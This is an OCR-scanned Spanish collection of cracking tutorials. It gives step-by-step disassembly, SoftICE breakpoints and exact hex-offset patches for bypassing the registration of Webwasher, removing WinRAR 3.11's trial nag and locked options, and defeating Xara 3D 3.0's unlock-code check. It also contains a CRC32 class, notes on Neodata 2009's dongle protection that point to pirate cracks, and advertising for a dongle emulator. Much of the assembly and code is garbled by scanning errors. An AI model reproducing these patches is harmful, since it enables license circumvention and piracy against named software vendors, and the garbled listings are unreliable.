mensaje que nos dice que somos unos trucho bárbaro que queremos registrar su programa con 
cualquier número. 

Paso 2: Luego recabamos información del ejecutable con el File insPEctor (para torpes: abrimos con 
el File insPEctor el ejecutable del programa y presionamos analizar, luego vamos a la solapa 
compilador y es acá en donde nos informa en el lenguaje que fue creado si esta empaquetado o 
encriptado), en este caso fue creado con Microsoft Visual c++ 6.00. 

Paso 3: sabiendo en que lenguaje esta escrito estamos en condiciones de poder desensamblar al 
programa con W32Dasm, luego verificamos si hay algún string que nos interese presionando el botón 
Strin ref y buscamos el mensaje que anotamos anteriormente (Sorry, you have entered a wrong 
license key!) pero no esta o algún otro string que nos de la gracias por habernos registrado pero 
no encontramos nada. 

Nota: en este paso no utilizamos softice de una por que siempre o Casi siempre para alguien que no 
tenga experiencia le es más fácil de entender el listado muerto que el listado en tiempo de 
ejecución. 

Paso 4: Bueno ya que en el paso anterior no tuvimos suerte lo que vamos a hacer es utilizar al 
Softice en la ventana de registro completamos los datos como en el paso uno y apretamos ctrl+d y 
estamos en la amada pantalla negra de muchos cracker, colocamos un break point en hmemcpy con bpx 
hmemcpy luego F5 y presionamos el botón Register, esto lo que hará es que salte el softice 
presionamos 5 veces F5 para que el programa tome nuestro datos y 10 F12 para retornar al programa 
en el lugar de donde se llama a esta función. Traceamos con Fl0. 


:004169DB 8B7C2410 mov edi, dword ptr [esp+10]<=Caemos aquí 

:004169DF 8B4720 mov eax, dword ptr [edi+20] 

:004169E2 85C0 test eax, eax 

:004169E4 “751D jnz 00416A03 <= como eax contiene la longitud de nuestro name 


entonces se produce el salto. 
Podemos decir entonces que esta rutina se encarga de averiguar si introducimos algo en name y si no 
encuentra nada nos muestra el mensaje "If you want to register you have to type in your name!" 
Nota: Probar en el salto de invertirlo con r fl z (con esto activamos la flag z) con esto el salto 
no se producirá y seguimos traceamos o presionamos F5 y nos muestra el mensajito. 
Después de que se produzca el salto llegamos a: 


:00416A03 8B4740 mov eax, dword ptr [edi+40] 
:00416A06 85C0 test eax, eax 
:00416A08 751D jne 00416A27 


Lo mismo de antes pero con Company, seguimos traceando con F10 se produce el salto y llegamos a: 
:00416A27 8BCF mov ecx, edi 


:00416A29 E872F8FFEFF call 004162A0 <=sospechoso, ponemos un bpx aquí con doble clik 
sobre la instrucción 

:00416A2E 85C0 test eax, eax 

:00416A30 0F84F5000000 jz 00416B2B <= como la flag no esta activa no saltamos 

:00416A36 8B4748 mov eax, dword ptr [edi+48] 

:00416A39 83F804 cmp eax, 00000004 

:00416A3C 7507 jne 00416A45 <= comprueba que la key no halla expirado 


Probemos de invertir el salto en 00416A30 con r fl z se produce el salto y nos pone el lindo 
cartelito de "Your registration was successful! Tank you for buying Webwasher" pero seguimos 
viendo en el borde inferior del programa "For non-commercial usage only!" lo que significa que no 
estamos registrado y supongo que la registración se produce dentro del call antes del salto. 

Dentro del softice colocamos bl para listar todos los break point que halla y borramos al de 
hmemcpy con bc 0, salimos del softice con F5. 


Presionamos el botón register y rompe el softice en el cal 004162a0 nos metemos dentro de el con 
F8 y empezamos a tracear y a experimentar con los salto que encontremos dentro de el, dependiendo 
de que salto se produzcan van hacer que al salir del call la flag este activo y de que licencia 
nos otorgue. 

A modo de ejemplo yo lo registro para 3 usuarios. 

Dentro del call: 


:004162A0 6AFF push FEFFEFFFEFF 

:004162A2 68FB654600 push 004665FB 

:004162A7 64A100000000 mov eax, dword ptr fs: [00000000] 

:004162AD 50 push eax 

:004162AE 64892500000000 mov dword ptr fs:[00000000], esp 

:004162B5 81EC00010000 sub esp, 00000100 

:004162BB 56 push esi 

:004162BC 8BF1 mov esi, ecx 

:004162BE 8D4C2408 lea ecx, dword ptr [esp+08] 

:004162C2 E8792B0000 call 00418E40 

:004162C7 C7464801000000 mov [esi+48], 00000001 

:004162CE 8B4640 mov eax, dword ptr [esi+40] 

:004162D1 85C0 test eax, eax 

:004162D3 C784240C01000000000000 mov dword ptr [esp+0000010C], 00000000 

:004162DE 752F jne 0041630F <= salta no pasa nada continuar 

:004162E0 8D4C2408 lea ecx, dword ptr [esp+08] 

:004162E4 C784240C010000FFFFFFFF mov dword ptr [esp+0000010C], FEFFFFFEF 

:004162EF E86C2B0000 call 00418E60 

:004162F4 B801000000 mov eax, 00000001 

:004162F9 5E pop esi 

:004162FA 8B8C2400010000 mov ecx, dword ptr [esp+00000100] 

:00416301 64890D00000000 mov dword ptr fs:[00000000], ecx 

:00416308 81C40C010000 add esp, 0000010C 

:0041630E C3 ret 

:0041630F 8B463C mov eax, dword ptr [esi+3C] 

:00416312 85C0 test eax, eax 

:00416314 7505 jne 0041631B <= salta no pasa nada continuar 

:00416316 A1882C4700 mov eax, dword ptr [00472C88] 

:0041631B 57 push edi 

:0041631C 50 push eax 

:0041631D 8D4C2410 lea ecx, dword ptr [esp+10] 

:00416321 E84A2B0000 call 00418E70 

:00416326 6683BC24FC00000000 cmp word ptr [esp+000000FC], 0000 

:0041632F 0F85DF000000 jne 00416414 

:00416335 8B461C mov eax, dword ptr [esi+1C] 

:00416338 85C0 test eax, eax 

:0041633A 7505 jne 00416341 <= invertir con r fl z 

:0041633C A1882C4700 mov eax, dword ptr [00472C88] 

:00416341 6A00 push 00000000 

:00416343 50 push eax 

:00416344 8D4C2414 lea ecx, dword ptr [esp+14] 

:00416348 E8E32D0000 call 00419130 

:0041634D 6683BC24FC00000000 cmp word ptr [esp+000000FC], 0000 

:00416356 0F85A9000000 jne 00416405 <= invertir con r fl z 

:0041635C 8A442477 mov al, byte ptr [esp+77] 

:00416360 84C0 test al, al 

:00416362 “7410 je 00416374 

:00416364 3C03 cmp al, 03 

:00416366 740C je 00416374 

:00416368 C7464803000000 mov [esi+48], 00000003 

:0041636F E9A0000000 jmp 00416414 

:00416374 8A442469 mov al, byte ptr [esp+69] 

:00416378 84C0 test al, al 

:0041637A 7422 je 0041639E <= invertir con r fl z 

:0041637C 8D4C240C lea ecx, dword ptr [esp+0C] 

:00416380 E8CB340000 call 00419850 

:00416385 6A00 push 00000000 

:00416387 8BF8 mov edi, eax 

:00416389 E8C90D0400 call 00457157 

:0041638E 83C404 add esp, 00000004 

:00416391 3BF8 cmp edi, eax <=escribir uno de los registro con el valor del otro 
(hacemos un click sobre el registro edi en la ventana de registros e introducimos el valor de 
eax) 

:00416393 7D09 Jjge 0041639E 

:00416395 C7464804000000 mov [esi+48], 00000004 

:0041639C EB76 jmp 00416414 

:0041639E 8D44240A lea eax, dword ptr [esp+0A] 

:004163A2 8D4C240B lea ecx, dword ptr [esp+0B] 

:004163A6 50 push eax 

:004163A7 8D54240D lea edx, dword ptr [esp+0D] 

:004163AB 51 push ecx 

:004163AC 52 push edx 

:004163AD 8D4C2418 lea ecx, dword ptr [esp+18] 

:004163B1 E87A340000 call 00419830 

:004163B6 0FBE442409 mOVSX €axX, byte ptr [esp+09] 


:004163BB 8B0D84D64800 mov ecx, dword ptr [0048D684] 
:004163C1 33FF xor edi, edi 

:004163C3 99 cdg 

:004163C4 C1E910 shr ecx, 10 

:004163C7 3BD7 cmp edx, edi 

:004163C9 7249 Jjb 00416414 

:004163CB 7704 ja 004163D1 

:004163CD 3BC1 cmp eaxX, ecx 

:004163CF 7243 Jjb 00416414 

:004163D1 8B842404010000 mov eax, dword ptr [esp+00000104] 
:004163D8 85C0 test eax, eax 

:004163DA 89460C mov dword ptr [esi+0C], eax 
:004163DD 7507 jne 004163E6 

:004163DF C7460CFFFEFFEF mov [esi+0C], FFFFFFEF 
:004163E6 8B842400010000 mov eax, dword ptr [esp+00000100] 
:004163ED C7464800000000 mov [esi+48], 00000000 
:004163F4 894610 mov dword ptr [esi+10], eax 
:004163F7 8A44246D mov al, byte ptr [esp+6D] 
:004163FB 3C01 cmp al, 

:004163FD 0F94C1 sete cl 

:00416400 884E14 mov byte ptr [esi+14], cl 
:00416403 EBOF jmp 00416414 

:00416405 8A44246A mov al, byte ptr [esp+6A] 
:00416409 84C0 test al, al 

:0041640B 7407 je 00416414 

:0041640D C7464802000000 mov [esi+48], 00000002 
:00416414 8B7648 mov esi, dword ptr [esi+48] 
:00416417 8D4C240C lea ecx, dword ptr [esp+0C] 


:0041641B C7842410010000FEFFFEFEFEF 
:00416426 E8352A0000 


mov dword ptr [esp+00000110], FFFFFEFEF 
call 00418E60 


:0041642B 8B8C2408010000 mov ecx, dword ptr [esp+00000108] 
:00416432 8BC6 mov eax, esi 

:00416434 5EF pop edi 

:00416435 5E pop esi 

:00416436 64890D00000000 mov dword ptr fs:[00000000], ecx 
:0041643D 81C40C010000 add esp, 0000010C 

:00416443 C3 ret 


Presionamos F5 y cha cha chan "Your registration was successful! Tank you for buying Webwasher" 
estará registrado esta porquería, miramos en el borde inferior izquierdo y dice 
Licence to: prometeo 


3 user licence 

Vamos a about dice que estamos registrado y nos muestra el número de una key la anotamos cerramos 
el programo y volvemos a iniciar el programa como ya es obvio no estamos registrado por que lo que 
hicimos anteriormente lo hicimos en memoria y al iniciar el programa todo vuelve a su estado 
original, probamos la key que tomamos nota pero no funca. 

Entonces lo que vamos hacer crear una copia de archivo original en otra parte de tu disco por si 
nos mandamos alguna cagada cuando con el editor hexadecimal produzcamos los cambios que realizamos 
en memoria. 

Abrimos al archivo original con W32Dasm y localizamos las direcciones en que tenemos que realizar 
los cambios y cuando estamos en la dirección que buscamos nos fijamos en la parte inferior de 
W32Dasm donde dice Roffset y da un valor con una h final, bueno este es nuestro offset le sacamos 
la h final y tomamos nota. Repetimos el proceso con todas las direcciones que tengamos que 
realizar Cambios. 

Ej: dirección:41632f offset:1632f 

Abrimos a la copia del archivo con el editor hexadecimal buscamos el offset presionando f5 e 
introducimos el valor del offset. 

Presionamos F3 y editamos en hexadecimal o además presionamos F2 para editar en ensamblador, 
guardamos los cambios con F9 y salimos con Fl10. 

Cambios a efectuar: 


Antes de los cambios | Después de los cambios 


offset Valor en hexa intrución en asm | offset Valor en hexa intrución en asm 


j 1632F 0F85DF000000 jne 
00416414 ! 1632F 90 nop 
! 16330 90 nop 
| 16331 90 nop 
| 16332 90 nop 
! 16333 90 nop 
H 16334 90 nop 
1 
| 
16356 0F85A9000000 jne 00416405 ! 16356 90 nop 
| 16357 90 nop 
| 16358 90 nop 
| 16359 90 nop 
| 1635A 90 nop 
i 1635B 90 nop 
| 1637A 


7422 je 0041639 ! 1637A 7522 


E 


jne 0041639E 
16391 


3BF8 cmp edi, eax | 16391 3BFF cmp edi, edi 


Después de realizar los cambios ejecutamos el archivo copia, introducimos los datos en la ventana 
de registro como en el paso 1 y conseguimos estar registrarlo finalmente. 

Despedida: 

Bueno con esto se termina este tuto que se me hizo bastante largo. Pido disculpas si me enrolle 
bastante tratando de explicar cosas muy básicas, pero la idea de esté texto era que lo entiendan 
los que recién empiecen en el cracking. 

Con todo esto lo único que me queda en el tintero es de dar las gracias a groovy por haber confiado 
en mi y permitirme publicar mi primer tutorial en su pagina. 

Contacto: cualquier duda, consulta o comentario enviar un e-mail a prometeoldata54.com 


Cracking WinRAR 3.11 - 15/02/03 
Soft necesario: 


- W32DASM 
- Softice 
- Editor hex 


Sacando el molesto nag: 


Bue, crackiar el winrar es muy facil..., aca vamos a sacar el nag de los 40 dias del trial... 

Adelanta la fecha de tu PC para ke te aparezca el nag de los 40 dias, y fijate el titulo ke dice "Please register" 
Desensambla el winrar.exe con el w32dasm y busca la frase "Please register", fijate ke tiene como nombre 
"REMINDER" 

busca la palabra reminder (la va a encontrar dos veces, pero la primera es la ke nos interesa) 

y nos situamos aca: 


* Possible StringData Ref from Data Obj ->"Reminder" 
vamos mas arriba hasta llegar a este salto condicional: 
0043BD86 7F04 jg 0043BD8C 


si marcas esa linea y vas a Execute Text -> Execute Jump vas a ver ke caes en el mensaje del REMINDER 
NOTA: "JG" significa "Mayor que...” osea, se cumple el salto si las comprobaciones de arriba son mayor que... (40 
dias) 


Ya esta todo casi dicho... te paras en 0043B952 y te fijas abajo donde dice (Offset 0003B386H, abris el editor 
hexadecimal 

buscas el Offset "3B386" y vas a ver ke dice "7F" lo cambias por "7C" guardas, y listo, no te aparece mas el nag 
molesto 

de los 40 dias... 

NOTA: Lo que hicimos fue cambiar JG (7F) por JL (7C), JL significa saltar si es menor que 40 dias... 

NOTA 2: Tambien podemos poner "90 90" en lugar de "7F 04" ke significa NOP (No OPeration). 


Habilitando opciones: 


Las unicas limitaciones ke tiene el trial (o al menos las ke yo encontre) son: 


Commands --> Add files to archive --> General --> Put authenticity verification 
|--> Backup --> Erase destination disk contents before archiving 


Options --> Settings --> General --> Log Errors to file 


Si keremos habilitar estas opciones salta un lindo messagebox diciendo ke esta solo disponible para la version 
registrada... 

si buscas esta string con el w32dasm te van a aparecer muchas, asike vamos a usar el softice. 

Abri el winrar y anda a: 


Commands --> Add files to archive --> General 

abri el softice y pone este breakpoint: 

bpx messageboxa 

habilita la opcion "Put authenticity verification”" y salta el softice, pero estamos en user32dll (linea verde), apreta F12 
para 

pasar al winrar, aparecemos en "0043e3c1" traceamos dos veces con Fl10 hasta pasar por el "RET" y llegar a 
"0044811E". Ahi hace un 

scroll para arriba (con cntrl + flacha arriba) y vas a ver: 

0044810E E8B3200400 CALL User32!IsDIGButtonCheked 

XXXXXXXX TEST EAX, EAX 

00448115 7411 JZ 00448128 


bueno, esto es facil =).... si se cumple el salto no pasa por el call del messagebox y keda habilitada esa opcion. 
pongamos un nuevo breakpoint: 


bpx 00448115 
y aparecemos justo en el condicional... apretamos "a + enter" y escribimos: 
JMP 00448128 


apretamos "enter" y como no keremos escribir mas codigo apretamos "ESC" 
y listo, ya keda habilitada esa opcion, solo keda agarrar un editor hex y buscar la cadena: 


74 11 8b c3 es 82 

y cambiar el 74 por un EB(JMP). 

NOTA: Para saber la cadena pone en el softice: "e 00448115" y anota un poco mas ademas del "74 11", porke si buscas 
el string "74 11" en el editor 

hex seguramente te va a aparecer mas de una vez. 

Bueno hasta aca solo habilitamos la opcion "Put authenticity verification”, para habilitar las demas se usa el mismo 


mecanismo asike no lo voy a 
volver a explicar =). 


Sacando el "(Evaluation Copy”) 


Buscando con el W32DASM, llegue a: 
* Possible Reference to String Resource ID=00873: "evaluation copy" 
viendo mas arriba hay un salto condicional ke de no cumplirse llega al "evaluation coypy": 


00445DAS 757A jne 00445e24 


cambiando este 75(¡ne) por un 74(Je) en un editor hexadecimal (Offset 453A8), ya no aparece mas el mensaje de 
evaluation copy. 


eSlacK. 


CRACKING XARA 3D 3.0 


Bueno abrimos Xara 3d 3.0 y vamos a registrar o algo haci, ponemos un numero cuaquiera como 31337 y vemos 
como nos salta el error. YOU ENTERED A INVALID UNLOCK CODE. THE PROGRAMA HAS NOT BEEN UNLOCKED 
Memorizamos esa frase y la buscamos en el W32Dasm 

Aparecemos aca: 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:0040FA34(C), :0040FA48(C), :0040FA64(C), :0040FA80(C), :0040FA9C(C) 
|:0040FAB8(C), :0040FAD4(C), :0040FAFO(C), :0040FB5D(C) 


* Possible Reference to Dialog: DialoglD_0133, CONTROL_ID:00FF, "" 


| 
:0040FC16 GAFF push FFFFFFFF 
:0040FC18 6A10 push 00000010 


* Possible Reference to String Resource ID=03005: "You entered an invalid unlock code. 
The program has not been" 


| 
:0040FC1A 68BDOB0000 push 00000BBD <€----ACA APERECEMOS 
:0040FC1F E803EA0700 call 0048E627 


y ahora lo que nos queda hacer es invertir todos los saltos que llaman a esta funcion. 


Estos son: 

* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:0040FA34(C), :0040FA48(C), :0040FA64(C), :0040FA80(C), :0040FA9C(C) 
|:0040FAB8(C), :0040FAD4(C), :0040FAFO(C), :0040FB5D(C) 


Vamos a Go To Code Location y ponemos de a una las 


0040FA34(C), :0040FA48(C), :0040FA64(C), :0040FA80(C), :0040FA9C(C) 
0040FAB8(C), :0040FAD4(C), :0040FAFO(C), :0040FB5D(C) 


Anotamos el OFFSET, lo ponemos en el Hex Editor preferido y cambiamos si es un Je por un JNE y si es un J NE por 
un Je 

Todos estos saltos estan a no mas de 5 lineas uno a bajo del otro asi que no te tenes que tomar el trabajo de 
ponerlos todos en Go to Code location. 


Los saltos son estos: 


:0040FA34 0F85DC010000 ¡ne 0040FC16 € ESTE 

:0040FA3A OFBE10 movsx edx, byte ptr [eax] 

:0040FA3D 52 push edx 

:0040FA3E E89D7E0500 call 004678E0 

:0040FA43 83C404 add esp, 00000004 

:0040FA46 85C0 test eax, eax 

:0040FA48 0F84C8010000 je 0040FC16 < ESTE POR 0F85 
:0040FA4E 8B842440010000 mov eax, dword ptr [esp+00000140] 
:0040FA55 OFBE4801 movsx ecx, byte ptr [eax+01] 
:0040FA59 51 push ecx 

:0040FA5A E8817E0500 call 004678E0 

:0040FA5F 83C404 add esp, 00000004 

:0040FA62 85C0 test eax, eax 

:0040FA64 0F84AC010000 je 0040FC16 € ESTE POR 0F85 
:0040FAGA 8B942440010000 mov edx, dword ptr [esp+00000140] 
:0040FA71 0FBE4202 movsx eax, byte ptr [edx+02] 
:0040FA75 50 push eax 


:0040FA76 E8657E0500 call 004678E0 


:0040FA7B 83C404 
:0040FA7E 85C0 

:0040FA80 0F8490010000 
:0040FA86 8B8C2440010000 
:0040FA8D OFBE5103 
:0040FA91 52 

:0040FA92 E8497E0500 
:0040FA97 83C404 
:0040FA9A 85C0 

:0040FA9C 0F8474010000 
:0040FAA2 8B842440010000 
:0040FAA9 OFBE4804 
:O040FAAD 51 

:0040FAAE E82D7E0500 
:0040FAB3 83C404 
:0040FAB6 85C0 

:0040FAB8 0F8458010000 
:0040FABE 8B942440010000 
:0040FAC5 OFBE4205 
:0040FAC9 50 

:O0040FACA E8117E0500 
:0040FACF 83C404 
:0040FAD2 85C0 
:0040FAD4 0F843C010000 
:0040FADA 8B8C2440010000 
:0040FAE1 OFBE5106 
:0040FAE5 52 

:0040FAE6 ESF57D0500 
:0040FAEB 83C404 
:0040FAEE 85C0 

:0040FAFO 0F8420010000 
:0040FAF6 8B842440010000 
:0040FAFD 0FBE4804 
:0040FBO1 OFBE5006 
:0040FB05 8DOC49 
:0040FB08 8DOCCA 
:0040FBOB OFBE5002 
:0040FBOF 8DOC49 
:0040FB12 8DOCCA 
:0040FB15 OFBE5005 
:0040FB19 8DOC49 
:0040FB1C 8DOCCA 
:0040FB1F OFBE10 
:0040FB22 8DOC49 
:0040FB25 8DOCCA 
:0040FB28 OFBE5001 
:0040FB2C 8DOC49 
:0040FB2F 8DOCCA 
:0040FB32 OFBE5003 
:0040FB36 8DOC49 
:0040FB39 8D84CA67216BFB 
:0040FB40 8BD5 

:0040FB42 8BCD 

:0040FB44 DIEA 

:0040FB46 81E155555555 
:0040FB4C 81E255555555 
:0040FB52 8DOC4A 
:0040FB55 69C951ED8764 
:0040FB5B 3BC1 

:0040FB5D 0F85B3000000 


add esp, 00000004 


test eax, eax 


je 0040FC16 < ESTE POR 0F85 
mov ecx, dword ptr [esp+00000140] 
movsx edx, byte ptr [ecx+03] 


push edx 


call 004678E0 
add esp, 00000004 


test eax, eax 


je 0040FC16 € ESTE POR 0F85 
mov eax, dword ptr [esp+00000140] 
movsx ecx, byte ptr [eax+04] 


push ecx 


call 004678E0 
add esp, 00000004 


test eax, eax 


je 0040FC16 € ESTE POR 0F85 
mov edx, dword ptr [esp+00000140] 
movsx eax, byte ptr [edx+05] 


push eax 


call 004678E0 
add esp, 00000004 
test eax, eax 
je 0040FC16 € ESTE POR 0F85 
mov ecx, dword ptr [esp+00000140] 
movsx edx, byte ptr [ecx+06] 


push edx 


call 004678E0 
add esp, 00000004 


test eax, eax 


je 0040FC16 < ESTE POR 0F85 
mov eax, dword ptr [esp+00000140] 
movsx ecx, byte ptr [eax+04] 
movsx edx, byte ptr [eax+06] 
lea ecx, dword ptr [ecx+2*ecx] 
lea ecx, dword ptr [edx+8*ecx] 
movsx edx, byte ptr [eax+02] 
lea ecx, dword ptr [ecx+2*ecx] 
lea ecx, dword ptr [edx+8*ecx] 
movsx edx, byte ptr [eax+05] 
lea ecx, dword ptr [ecx+2*ecx] 
lea ecx, dword ptr [edx+8*ecx] 
movsx edx, byte ptr [eax] 
lea ecx, dword ptr [ecx+2*ecx] 
lea ecx, dword ptr [edx+8*ecx] 
movsx edx, byte ptr [eax+01] 
lea ecx, dword ptr [ecx+2*ecx] 
lea ecx, dword ptr [edx+8*ecx] 
movsx edx, byte ptr [eax+03] 
lea ecx, dword ptr [ecx+2*ecx] 
lea eax, dword ptr [edx+8*ecx-0494DE99] 
mov edx, ebp 
mov ecx, ebp 
shr edx, 1 
and ecx, 55555555 
and edx, 55555555 
lea ecx, dword ptr [edx+2*ecx] 
¡mul ecx, 6487ED51 
cmp eax, ecx 
¡ne 0040FC16 € ESTE POR 0F84 


Algoritmo CRC32 en C+ 


Pero a ver, que es el algoritmoCRC32 y para que me puede servir? 


El algoritmo CRC32 (Código de Redundancia Cíclica) se utiliza para proteger la 
integridad de los datos al verificar que dichos datos no han sido alterados, comparando 

el CRC32 de los datos enviados con el CRC32 de los datos recibidos. Lo que ocurre aquí 
es que si se modifica aunque sea un punto de los datos iniciales, el resultado del CRC32 es 
completamente diferente. 


Pues bien, hice una clase adicional para poder invocarlo de forma más fácil ya que la 
versión original me pareció algo rebuscado y yo necesitaba dicho algoritmo pero con un 
resultado en decimal y no en hexadecimal como devuelve el algoritmo inicial. 


La forma de invocar el resultado desde cualquier punto de la aplicación es la siguiente: 


Algoritmos.AlgoritmoCRC32 al = new Algoritmos.AlgoritmoCcRc32(); 
textBox1.Text = al.CRC32Hexa(”Hola mundo”); 
textBox2.Text = al.CRC32Decimal(”Hola mundo”); 


El resultado CRC32 de ambos casos es: FOEC15CE y 4192998862 respectivamente, si se 
modifica algo de la cadena, los resultados serían completamente diferentes. 


Ahora, en el Zip que contiene las clases, encontrarán 3 

archivos, Algorithm.cs yCRC32.cs son las clases iniciales que obtuve, la 

clase AlgoritmoCRC32.cs es la clase que implementé para hacer un poco más accesible el 
código, tal como ven en el siguiente código: 


using System; 

using System.Collections.Generic; 
using System.Text; 

namespace Algoritmos 


class AlgoritmoCRrRCc32 


t 
public AlgoritmoCrc32() 
t3 


public string CRC32Hexa(string cadena) 


t 
return ChkSumCRC32(cadena); 
y 


public string CRC32Decimal(string cadena) 


¿7 
return Convert.ToInt64(ChkSumCRC32(cadena), 16).ToString(); 


J 


private string ChkSumCRC32(string cadena) 


Algorithm alg = new Algorithm(”CRC32”, new CRC32()); 
alg.hash.Initialize(); 


byte[] rawBytes = System.Text.ASCIIEncoding.ASCII.GetBytes(cadena); 
byte[] hash = alg.hash.ComputeHash(rawBytes); 


StringBuilder sb = new StringBuilder(hash.Length * 2 + (hash.Length / 
8)); 

for (int i= 0; i< hash.Length; i++) 
sb.Append(BitConverter.ToString(hash, i, 1)); 


return sb.ToString().TrimEnd(new char[] (£ * * P); 
J 
J 
y 


Programa: ¡Neodata 2009 (V18M2009R23 Version 
19/Junio/2009) 


PROTECCION: || Centinel ( Serial/Name en llave física USB Negra Dongle), CRC32, Antidebugger, Multiples 
rutinas de chequeo de centinel al estar trabajando 


Descripción: || Programa para hacer presupuestos de obra, los presupuestos se pueden exportar en 
formato word, pdf, Excel (desde el visor de reportes),para saber cuanto cuesta una 
obra en Pesos propuesta técnica Ó propuesta económica, se puede utilizar como versión 
demo si no contamos con la llave física, Demo limitación de conceptos de obra solo se pueden trabajar 
sin limitantes hasta con 50 conceptos, si tenemos más de 50 conceptos se bloquean varias secciones del 


programa, 
eulesds Avanzada (Master) 


| DOWNLOAD: | http://www .neodata.com.mx/archivos/Precios2009.exe 392MB 


Herramientas : [pp;q y0,95, IDA Pro 5, Wdasm32 V8.93, Ultra Edit 32 v10, 
CRACKER : o Varios FECHA: Mayo 2010 


[| INTRODUCCION | 


Este Software Méxicano se puede descarga desde la web del desarrollador del 
Neodata 2009, sin necesidad de registrarse, esta actualización pesa unos 392MB 
aprox, y es para usuarios que en teoria ya tienen la llave dongle en su poder, 
como caracteristica notable este programa se puede utilizar como version demo 
si no contamos con la llave fisica, 

ya anda circulando una version pirata que no usa llave emuladora, si no que 
utiliza un crack del ejecutable, googlea para encontrar dicha aplicacion de 
las redes torrent's, 


como dato, nos encontramos que 


1.- la pastilla dongle esta fuertemente encriptada 
2.-la empresa desarrolladora del software se le entrega un código fuente 
especial para poder meterlo en su software y tenga la misma encriptación 
3.- La comunicacion entre la pastilla dongle y el software estan fuerte 
menete encriptados, y la proteccion antidebugger tambien esta dentro 
de este código fuertemente encriptado 
.Tasi que estara dificil poder romper esta proteccion 
.—Posibles soluciones 
Hacer un pluggin especial para este software, para evitar romper 
la proteccion antidebugger, ya que los plugins actualmente echos 
para el ollydbg, se traban, ya que se encuentran con la encriptacion 
y se bloque el debugger puesto que al toparse con la proteccion 
antidebugger encriptada este se bloquea por consiguiente 
no se puede debuggear con codigo vivo 
.Crear un codigo para emular comunicacion entre un software y una pastilla 
y compilarlo, y debuggear en este para ir trazando como se comporta la 
comunicación con este software 


Neodata_2009.htm[ 17/07/2016 12:08:10 p. m.] 


UN POCO DE 
TEORIA ANTES 


DEL ATAQUE 


Conceptos básicos de precios unitarios para poder usar el programa (No son mi especialidad pero investigue en san 
google) 


01.- ¿que es el precio venta? 
02.- ¿que es flujo de obra? 
03.- ¿que es explosión de insumos? 


04.- ¿Que es FASAR Factor de salario real? : Son las prestaciones de acuerdo a la ley del seguro social y de la ley federal del trabajo, estas leyes cambian constantemente , por lo que debemos de estar 
revisándolas antes de entregar una propuesta economica, Al salario base de los trabajadores debemos de sumar el factor de salario base para poder hacer nuestro análisis de costo directo 

05.- ¿En cuantas partes se compone el presupuesto?: 

06.- Venta-costo=? : 

07.- ¿Que es el costo directo?: Es el precios de una actividad en el cual interviene; mano de obra,insumos,materiales, maquinaria, equipo y herramienta, Al salario base de los trabajadores debemos de 
incluir el Factor de salario real 
08.- ¿Que es el costo indirecto? : son los gastos de oficina por lo regular se le asigna el 15% del costo directo 

09.- ¿Que es un generador de obra? 

10.- ¿que es el cotizado? 

11.- ¿Que es un destajo? 


12.- ¿Que es la ruta critica?: Es la secuencia de los actividades terminales de una obra con la mayor duración entre ellos, determinando el tiempo más corto en el que es posible completar el proyecto. La 


duración de la ruta crítica determina la duración del proyecto entero. Cualquier retraso en un elemento de la ruta crítica afecta a la fecha de término planeada del proyecto, y se dice que no hay holgura en 
la ruta crítica. 


13.- ¿Que es el programa de obra?: 
14.- ¿Que es un precio unitario? 

15.- ¿Que es un presupuesto? 

16.- ¿que es un catalogo de conceptos? 
17.- ¿Que es una estimación? 


18.- ¿que es un insumo?: Es el elemento independiente , para realizar una actividad especifica, ejemplo; insumo de mano obra indica cuanto gana un albañil diario, insumos de materiales indica el precio 


venta al público por parte de la casa de materiales, insumos herramienta, insumos materiales ejemplo el insumo de un hilo para trazo topografico con valor de $20 pesos, 
19.- ¿Que es un costo horario? 


20.- ¿que es la mano de obra? 

21.- ¿que es la conciliación? 

22.- ¿Que es una propuesta técnica? 
23.- ¿Que es una propuesta económica? 
24.- ¿Que es el financiamiento? 

25.- ¿Que es una escalatoria? 
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LIMITANTES DE LA VERSION DEMO 
(OBVIO SI TENEMOS LA DONGLE NO HAY LIMITES) 


00.- Al iniciar el programa nos dice que es una versión demo y que trabajara con limitantes 
01.- Neodata 2009 permite trabajar con hasta 50 conceptos con toda la funcionalidad , 
02.-BLOQUEO DE LA ULTIMA CELDA CUANDO REVAZAMOS LOS 50 CONCEPTOS, 
NO PERMITE CAPTURAR MAS CELDAS 
03.-No se puede abrir el visor de reportes para imprimir 
04.- El Catalogo maestro de insumos ''Cotizador'' solo admite jalar 90 conceptos 
a nuestro presupuesto después muestra un mensaje de que trabajara en modo visor (demo versión) 
05.- Al abrir el programa y cargar nuestro catalogo con los 90 conceptos como limite, 
nos recuerda que se trabajara en modo visor (versión demo) 
06.- Permite arrastrar hasta 90 conceptos de insumos , pero se bloque la celda de cantidad 
07.- Solo permite trabajar de manera total con 50 conceptos de manera funcional al 100%, 
si excedemos nos bloqueara las celdas , no dejándonos introducir cantidades 
08.- No se pueden borrar los renglones de cualquier concepto y una ventana nos recuerda que estamos en modo visor 
Solo sucede cuando hemos rebasado más de 50 a conceptos, con menos de 50 conceptos no sucede esto 
09.- 


ESTA DEMO TRABAJA COMO RETAIL FULL VERSION, SIN LIMITACION DE NINGUN TIPO 


Cuantifica directo de AutoCAD, utiliza nuestra base de datos Cotizador con 5,000 matrices, 27,000 insumos para el DF y 8,000 insumos para 30 ciudades, usa nuestro 
módulo InteliMat como asistente para generar tus precios unitarios, InteliPre para presupuestos inteligentes, y NeodataCAD para total integración con el plano en 
AutoCAD. 


Recordando ...... Neodata Precios Unitarios 2008 
Sentinel Emulator 2007 


NeoBit compañía ha estado trabajando en el campo de la ingeniería inversa desde 1998 y se especializa en el programa de creación de copias de las llaves de hardware. 
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"Dongle" es un pequeño dispositivo electrónico responsable de la autorización de software. Neobit trabaja con las siguientes marcas "dongle" únicamente: 
HASP 3, HASP 4, HASP HL y HardLock por Aladdin Knowledge Systems, 
Sentinel SuperPRO / PRO / CPlus / Scribe por Rainbow (ahora Caja - Net Inc). 


Hay muchos inconvenientes y amenazas para dongles ": 

- Dongle es una pieza de hardware que puede perderse. 

- Hay un gran mercado de segunda mano de software y dongles ". 

- Esa es la razón de la gran cantidad de robos "dongle". 

- Despidan trabajadores o competidores roba claves de hardware hacer daño a su negocio. 
- Como cualquier dispositivo electrónico, el dongle puede morir. 


Principales características del Dongle emulador de neoBit: 
- 100% software de emulación de HASP3, HASP4, Hardlock FAST E - E - Y, 


Rainbow Sentinel SuperPRO, Pro, CPlus, Scribe. 

- Altamente fiable código probados por miles de clientes. 

- Transparente para otros dongles ". 

